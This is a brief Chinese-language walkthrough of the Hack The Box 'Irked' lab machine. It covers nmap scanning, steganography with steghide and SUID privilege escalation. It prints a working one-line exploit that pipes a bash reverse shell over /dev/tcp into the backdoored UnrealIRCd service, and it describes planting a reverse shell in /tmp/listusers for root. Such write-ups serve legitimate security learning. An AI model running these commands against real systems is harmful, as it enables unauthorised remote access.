HTB-Irked

NULL

首先,照旧是nmap一把梭

80是一张罪恶图

提示又IRC,之前没扫到,就追加扫描1000以后的端口,在8067,开了unrealIRC。探测出来版本是3.2.8.1,有后门
https://www.exploit-db.com/exploits/16922
手工利用一下

1
echo "AB; bash -c 'bash -i >& /dev/tcp/10.10.14.3/9000  0>&1'" | nc 10.10.10.117 8067

弹回来irked的用户,在home下有用户djmardov,而且没看到,user.txt,找了一下,这题他把东西放在了Document文件夹下面。同时,还有一个.back。

f**k,魂斗罗。还有个隐写。那就是很难受了。经过论坛高人指点,就是上面那张该死的图片,用steghide提取隐藏的文件,pass.txt。

这估计是ssh的密码了,毕竟啥也不像。
登录进了djmardov,啥也没有,LinEnum检查一下,只在在SUID里找到两个新的应用。

前一个是个debian预装的邮箱系统,那后一个没见过,运行一下

我不会二进制,但他看起来像是sh运行了/tmp/listusers,那就写个反弹shell,再运行,shell就弹回来了

看了wp,跟猜的差不多,调用了system去读这个文件,我还是tcl…